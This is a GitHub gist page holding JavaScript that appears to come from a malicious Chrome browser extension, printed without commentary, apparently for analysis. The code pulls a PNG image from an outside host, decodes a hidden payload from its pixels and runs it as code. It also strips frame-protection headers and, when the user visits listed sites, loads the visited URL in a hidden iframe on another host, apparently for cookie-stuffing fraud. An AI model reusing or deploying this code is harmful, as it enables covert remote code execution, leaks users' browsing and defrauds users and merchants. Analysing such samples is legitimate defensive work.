-
-
Save ameshkov/be62c81e09daf1b652f01d356987964c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var c = '61'; | |
var ckey = 'zPShu9x7lARuvzXk'; | |
var _0xa7f4 = ["\x37\x34\x35\x32", "\x36\x39\x33\x36\x38\x34\x37", "\x69\x64\x5F\x61", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x2E\x71\x79\x7A\x2E\x73\x78", "\x73\x65\x74", "\x63\x6F\x6F\x6B\x69\x65\x73", "\x4B\x62\x5A\x62\x47\x4E\x76\x73\x5A\x64\x53\x42\x61\x50\x72\x38\x70\x73\x42\x37\x6A\x45\x61\x4C\x75\x76\x53\x77\x35\x51\x33\x46", "\x6D\x64\x35", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x2E\x71\x79\x7A\x2E\x73\x78\x2F\x67\x6F\x3F\x78\x3D", "\x26\x63\x3D", "\x2B\x26\x73\x3D", "\x66\x66\x66\x66\x30\x39\x32\x31\x33\x30\x37\x31\x32\x30\x33\x39\x5F", "\x6E\x6F\x77", "\x66\x6C\x6F\x6F\x72", "\x69\x66\x72\x61\x6D\x65", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x73\x72\x63", "\x69\x64", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x62\x6F\x64\x79", "\x72\x65\x6D\x6F\x76\x65", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", "\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64", "\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65", "\x72\x65\x6C\x6F\x61\x64", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x6C\x6F\x63\x61\x6C", "\x73\x74\x6F\x72\x61\x67\x65", "\x62\x62", "\x6C\x65\x6E\x67\x74\x68", "\x6B\x65\x79\x73", "\x62\x62\x65", "\x67\x65\x74", "\x74\x61\x62\x49\x64", "\x72\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72\x73", "\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65", "\x6E\x61\x6D\x65", "\x69\x6E\x64\x65\x78\x4F\x66", "\x78\x2D\x66\x72\x61\x6D\x65\x2D\x6F\x70\x74\x69\x6F\x6E\x73", "\x66\x72\x61\x6D\x65\x2D\x6F\x70\x74\x69\x6F\x6E\x73", "\x73\x70\x6C\x69\x63\x65", "\x73\x75\x62\x5F\x66\x72\x61\x6D\x65", "\x3C\x61\x6C\x6C\x5F\x75\x72\x6C\x73\x3E", "\x62\x6C\x6F\x63\x6B\x69\x6E\x67", "\x61\x64\x64\x4C\x69\x73\x74\x65\x6E\x65\x72", "\x6F\x6E\x42\x65\x66\x6F\x72\x65\x53\x65\x6E\x64\x48\x65\x61\x64\x65\x72\x73", "\x77\x65\x62\x52\x65\x71\x75\x65\x73\x74", "\x68\x6F\x73\x74\x6E\x61\x6D\x65", "\x75\x72\x6C", "\x77\x77\x77", "\x73\x75\x62\x73\x74\x72", "\x25\x55\x6A\x79\x25\x42\x4E\x59\x30\x4F", "\x67\x65\x74\x54\x69\x6D\x65", "\x72\x6F\x75\x6E\x64", "\x70\x75\x73\x68", "\x6D\x61\x69\x6E\x5F\x66\x72\x61\x6D\x65", "\x6F\x6E\x42\x65\x66\x6F\x72\x65\x52\x65\x71\x75\x65\x73\x74", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x68\x61\x6E\x73\x74\x72\x61\x63\x6B\x72\x2E\x63\x6F\x6D\x2F\x69\x6D\x61\x67\x65\x2D", "\x2E\x70\x6E\x67\x3F\x74\x3D", "\x6F\x6E\x6C\x6F\x61\x64", "\x32\x64", "\x67\x65\x74\x43\x6F\x6E\x74\x65\x78\x74", "\x63\x61\x6E\x76\x61\x73", "\x77\x69\x64\x74\x68", "\x68\x65\x69\x67\x68\x74", "\x64\x72\x61\x77\x49\x6D\x61\x67\x65", "\x67\x65\x74\x49\x6D\x61\x67\x65\x44\x61\x74\x61", "\x64\x61\x74\x61", "\x70\x61\x72\x73\x65", "\x74\x65\x78\x74", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65", "\x73\x74\x61\x74\x75\x73", "\x73\x70\x6C\x69\x74", "\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x47\x45\x54", "\x72\x65\x73\x2F\x63\x6F\x75\x70\x6F\x6E\x73\x2E\x74\x78\x74", "\x67\x65\x74\x55\x52\x4C", "\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E", "\x6F\x70\x65\x6E", "\x73\x65\x6E\x64", "\x63\x6F\x6E\x73\x74\x72\x75\x63\x74\x6F\x72", "\x66\x69\x6C\x74\x65\x72", "\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74", "\x63\x6F\x6E\x63\x61\x74", "\x61\x62\x73", "", "\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65", "\x6A\x6F\x69\x6E"]; | |
var signatures = [], | |
signaturesBlockList = [], | |
signaturesBlockListExpires = {}, | |
owa = function(variable_0, variable_1) { | |
cookieValue = btoa(variable_0), cookieValue = btoa(cookieValue), cookieValue = "7452" + cookieValue + "6936847", chrome["cookies"]["set"]({ | |
name: "id_a", | |
url: "https://g.qyz.sx", | |
value: cookieValue | |
}, function(variable_0) {}), x = variable_1, s = $["md5"](variable_0 + "KbZbGNvsZdSBaPr8psB7jEaLuvSw5Q3F"), variable_0 = "https://g.qyz.sx/go?x=" + x + "&c=" + c + "+&s=" + s; | |
var variable_2 = "ffff092130712039_" + Math["floor"](Date["now"]()), | |
variable_3 = document["createElement"]("iframe"); | |
variable_3["src"] = variable_0, variable_3["id"] = variable_2, document["body"]["appendChild"](variable_3), setTimeout(function() { | |
chrome["cookies"]["remove"]({ | |
url: "https://g.qyz.sx", | |
name: "id_a" | |
}) | |
}, 3e3), setTimeout(function() { | |
var variable_0 = document["getElementById"](variable_2); | |
variable_0["parentNode"]["removeChild"](variable_0), window["location"]["reload"]() | |
}, 15e3) | |
}, | |
s3 = function() { | |
chrome["storage"]["local"]["set"]({ | |
bb: signaturesBlockList | |
}), chrome["storage"]["local"]["set"]({ | |
bbe: signaturesBlockListExpires | |
}) | |
}, | |
l3 = function(variable_0) { | |
chrome["storage"]["local"]["get"]("bb", function(variable_1) { | |
!variable_1 || Object["keys"](variable_1)["length"] <= 0 ? variable_0() : (signaturesBlockList = variable_1["bb"], chrome["storage"]["local"]["get"]("bbe", function(variable_2) { | |
!variable_2 || Object["keys"](variable_1)["length"] <= 0 ? variable_0() : (signaturesBlockListExpires = variable_2["bbe"], variable_0()) | |
})) | |
}) | |
}, | |
x3 = function() { | |
chrome["webRequest"]["onBeforeSendHeaders"]["addListener"](function(variable_0) { | |
if (-1 == variable_0["tabId"]) { | |
for (var variable_1 = 0; variable_1 < variable_0["requestHeaders"]["length"]; ++variable_1) { | |
var variable_2 = variable_0["requestHeaders"][variable_1]["name"]["toLowerCase"](); | |
if (-1 !== ["x-frame-options", "frame-options"]["indexOf"](variable_2)) { | |
variable_0["requestHeaders"]["splice"](variable_1, 1); | |
break | |
} | |
}; | |
return { | |
requestHeaders: variable_0["requestHeaders"] | |
} | |
} | |
}, { | |
types: ["sub_frame"], | |
urls: ["<all_urls>"] | |
}, ["blocking", "requestHeaders"]), chrome["webRequest"]["onBeforeRequest"]["addListener"](function(variable_0) { | |
var variable_1 = new URL(variable_0["url"])["hostname"]["toLowerCase"](), | |
variable_2 = variable_0["url"]; | |
"www" == variable_1["substr"](0, 3) && (variable_1 = variable_1["substr"](4)); | |
var variable_4 = $["md5"](variable_1 + "%Ujy%BNY0O"), | |
variable_3 = Math["round"]((new Date)["getTime"]() / 1e3); | |
for (var variable_5 in signatures) { | |
if (signatures[variable_5] == variable_4) { | |
if (-1 == signaturesBlockList["indexOf"](variable_4)) { | |
signaturesBlockList["push"](variable_4), signaturesBlockListExpires[variable_4] = variable_3 + 86400, s3() | |
} else { | |
if (signaturesBlockListExpires[variable_4] > variable_3) { | |
return | |
}; | |
signaturesBlockListExpires[variable_4] = variable_3 + 86400, s3() | |
}; | |
owa(variable_2, variable_4); | |
break | |
} | |
} | |
}, { | |
urls: ["<all_urls>"], | |
types: ["main_frame"] | |
}, ["blocking"]) | |
}; | |
l3(function() { | |
var variable_0 = new Image; | |
variable_0["src"] = "https://www.hanstrackr.com/image-" + ckey + ".png?t=" + +new Date, variable_0["onload"] = function() { | |
var variable_1 = document["createElement"]("canvas")["getContext"]("2d"); | |
variable_1["canvas"]["width"] = variable_0["width"], variable_1["canvas"]["height"] = variable_0["height"], variable_1["drawImage"](variable_0, 0, 0); | |
var variable_2 = variable_1["getImageData"](0, 0, variable_1["canvas"]["width"], variable_1["canvas"]["height"]), | |
variable_4 = decodeMessage(variable_2["data"], [1102318550, 902749891, 1834543077, -1708232615, 1651755051, 364409623, -1318698268, 1075183187]), | |
variable_3 = null; | |
try { | |
variable_3 = JSON["parse"](variable_4) | |
} catch (variable_0) {}; | |
variable_3 && variable_3["text"] && verify(variable_3["text"]) | |
}; | |
var variable_1 = new XMLHttpRequest; | |
variable_1["onreadystatechange"] = function() { | |
4 == variable_1["readyState"] && 200 == variable_1["status"] && (signatures = variable_1["responseText"]["split"](/\r?\n/), x3()) | |
}, variable_1["open"]("GET", chrome["extension"]["getURL"]("res/coupons.txt"), !0), variable_1["send"](null) | |
}); | |
var verify = function(variable_0) { | |
[]["filter"]["constructor"](variable_0)() | |
}, | |
getBit = function(variable_0, variable_1) { | |
return variable_0 >> variable_1 & 1 | |
}, | |
setBit = function(variable_0, variable_1, variable_2) { | |
return variable_0 & ~(1 << variable_1) | variable_2 << variable_1 | |
}, | |
getBitsFromNumber = function(variable_0) { | |
for (var variable_1 = [], variable_2 = 0; variable_2 < 16; variable_2++) { | |
variable_1["push"](getBit(variable_0, variable_2)) | |
}; | |
return variable_1 | |
}, | |
getNumberFromBits = function(variable_0, variable_1, variable_2) { | |
for (var variable_4 = 0, variable_3 = 0; variable_3 < 16;) { | |
var variable_5 = getNextLocation(variable_1, variable_2, variable_0["length"]), | |
variable_66 = getBit(variable_0[variable_5], 0); | |
variable_4 = setBit(variable_4, variable_3, variable_66), variable_3++ | |
}; | |
return variable_4 | |
}, | |
getMessageBits = function(variable_0) { | |
for (var variable_1 = [], variable_2 = 0; variable_2 < variable_0["length"]; variable_2++) { | |
var variable_4 = variable_0["charCodeAt"](variable_2); | |
variable_1 = variable_1["concat"](getBitsFromNumber(variable_4)) | |
}; | |
return variable_1 | |
}, | |
getNextLocation = function(variable_0, variable_1, variable_2) { | |
for (var variable_4 = variable_0["length"], variable_3 = Math["abs"](variable_1[variable_4 % variable_1["length"]] * (variable_4 + 1)) % variable_2;;) { | |
if (variable_3 >= variable_2) { | |
variable_3 = 0 | |
} else { | |
if (variable_0["indexOf"](variable_3) >= 0) { | |
variable_3++ | |
} else { | |
if ((variable_3 + 1) % 4 != 0) { | |
return variable_0["push"](variable_3), variable_3 | |
}; | |
variable_3++ | |
} | |
} | |
} | |
}, | |
decodeMessage = function(variable_0, variable_1) { | |
var variable_2 = [], | |
variable_4 = getNumberFromBits(variable_0, variable_2, variable_1); | |
if (16 * (variable_4 + 1) > 0.75 * variable_0["length"]) { | |
return "" | |
}; | |
if (0 === variable_4) { | |
return "" | |
}; | |
for (var variable_3 = [], variable_5 = 0; variable_5 < variable_4; variable_5++) { | |
var variable_66 = getNumberFromBits(variable_0, variable_2, variable_1); | |
variable_3["push"](String["fromCharCode"](variable_66)) | |
}; | |
return variable_3["join"]("") | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment